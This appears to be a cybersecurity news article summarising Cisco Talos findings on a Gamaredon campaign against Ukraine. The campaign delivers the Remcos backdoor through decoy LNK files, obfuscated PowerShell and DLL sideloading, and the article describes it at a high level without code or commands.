5 Alarming Tactics Used by Gamaredon to Deploy Remcos Backdoor via LNK Files on Windows

Overview of the Cyber Espionage Strategy

A new sophisticated cyber espionage campaign, spearheaded by the Russia-linked Gamaredon group, targets Ukrainian entities with advanced tactics and deceptive practices to implant malware.

Weaponized LNK Files as a Deceptive Delivery Mechanism

Camouflaged as innocuous Office documents, the weaponized LNK files used in these attacks carry the pernicious Remcos backdoor. The attackers craft themes resonating with troop movements in Ukraine to bait victims into activating their perilous payloads.

The Infection Process

The malicious cycle triggers when victims receive ZIP archives that contain LNK shortcuts, misleadingly labeled with military titles such as “Probable location of communication nodes” and “Coordinates of enemy takeoffs.” Executing these files launches a stealthy PowerShell operation while displaying a decoy document to mislead the target and mask the ongoing malicious activities.

The cybersecurity experts at Cisco Talos identified this sophisticated campaign, active since November 2024, targeting Ukraine’s government and critical infrastructure sectors.

Evasion and Obfuscation Techniques

• The PowerShell downloader cleverly uses obfuscation to slip past security defenses.
• Communication with geographically restricted servers in Russia and Germany enables the download of further malware stages.
• A sophisticated use of PowerShell involves indirect command execution to dodge string-based detections typical in many security solutions.

DLL Sideloading: A Stealthy Method to Execute Malware

The attackers employ DLL sideloading where the legitimate application, TiVoDiag.exe, is manipulated to load a malicious DLL named “mindclient.dll.” This covert technique allows the upload and execution of the Remcos backdoor from encrypted files in the ZIP archive, as illustrated in the recent findings from Cisco Talos.

This approach exploits the predictable DLL search order in Windows, causing the system to load the malicious DLL instead of the legitimate one.

Once the backdoor is successfully injected into the system, it embeds itself in the Explorer.exe process, facilitating persistent espionage activities through communications with control servers hosted on GTHost and HyperHosting.

Implications and Defense Strategies

This ongoing campaign underscores the strategic persistence of the Gamaredon group in its cyber espionage initiatives against Ukraine. Affected organizations and allies are urged to adopt stringent security measures and remain vigilant for signs of compromise linked to this campaign.

Discover more on this urgent cybersecurity threat and protection strategies on Cybersecurity News.